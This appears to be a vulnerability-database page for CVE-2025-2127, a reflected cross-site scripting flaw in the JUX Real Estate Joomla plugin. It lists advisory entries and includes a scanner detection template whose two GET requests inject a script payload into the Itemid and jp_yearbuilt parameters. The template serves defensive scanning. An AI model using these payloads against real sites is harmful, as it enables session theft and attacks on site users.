| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| The vulnerability of the JoomlaUX JUX Real Estate plugin for the Joomla content management system (CMS) arises from insufficient measures taken to protect the structure of web pages. This allows attackers to execute cross-site scripting attacks. | 17 Dec 202500:00 | – | bdu_fstec | |
| CVE-2025-2127 | 9 Mar 202517:37 | – | circl | |
| JoomlaUX JUX Real Estate 代码注入漏洞 | 9 Mar 202500:00 | – | cnnvd | |
| CVE-2025-2127 | 9 Mar 202517:31 | – | cve | |
| CVE-2025-2127 JoomlaUX JUX Real Estate realties cross site scripting | 9 Mar 202517:31 | – | cvelist | |
| EUVD-2025-7512 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-2127 | 9 Mar 202518:15 | – | nvd | |
| JUX Real Estate 3.4.0 Cross Site Scripting | 10 Mar 202500:00 | – | packetstorm | |
| PT-2025-10455 · Joomlaux · Joomlaux Jux Real Estate | 9 Mar 202500:00 | – | ptsecurity | |
| CVE-2025-2127 | 12 Mar 202511:30 | – | redhatcve |
| Source | Link |
|---|---|
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2025-2127 |
| vuldb | www.vuldb.com/ |
| vuldb | www.vuldb.com/ |
id: CVE-2025-2127
info:
name: JoomlaUX JUX Real Estate 3.4.0 - Reflected XSS
author: 3th1c_yuk1
severity: medium
description: |
A vulnerability was found in JoomlaUX JUX Real Estate 3.4.0 on Joomla. It has been classified as problematic. Affected is an unknown function of the file /extensions/realestate/index.php/properties/list/list-with-sidebar/realties. The manipulation of the argument Itemid/jp_yearbuilt leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
impact: |
Attackers can inject malicious JavaScript through the Itemid and jp_yearbuilt parameters, potentially stealing user session cookies, redirecting users to malicious sites, or performing unauthorized actions in the context of authenticated users.
remediation: |
Upgrade to the latest patched version of JUX Real Estate that properly sanitizes user input.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-2127
- https://vuldb.com/?id.299040
- https://vuldb.com/?ctiid.299040
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2025-2127
cwe-id: CWE-79
epss-score: 0.0097
epss-percentile: 0.57458
cpe: cpe:2.3:a:joomlaux:jux_real_estate:3.4.0:*:*:*:*:joomla:*:*
metadata:
vendor: joomlaux
product: jux_real_estate
framework: joomla
fofa-query: body="joomlaux"
verified: true
max-request: 2
tags: cve,cve2025,joomlaux,joomla,vuln
http:
- method: GET
path:
- "{{BaseURL}}/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=6wdv%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ewz8nu&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search"
- "{{BaseURL}}/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3eflmo8&button=Search"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'joomlaux'
condition: and
- type: word
part: content_type
words:
- "text/html"
# digest: 4a0a00473045022030c54eee247eb997946a1c4ff8c357299c1dae574bf1c76f5b0d86dc46c4790a022100967431aee4990a557204d071c814e213e1d0971e717c8d4e621de94e357e40ce:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation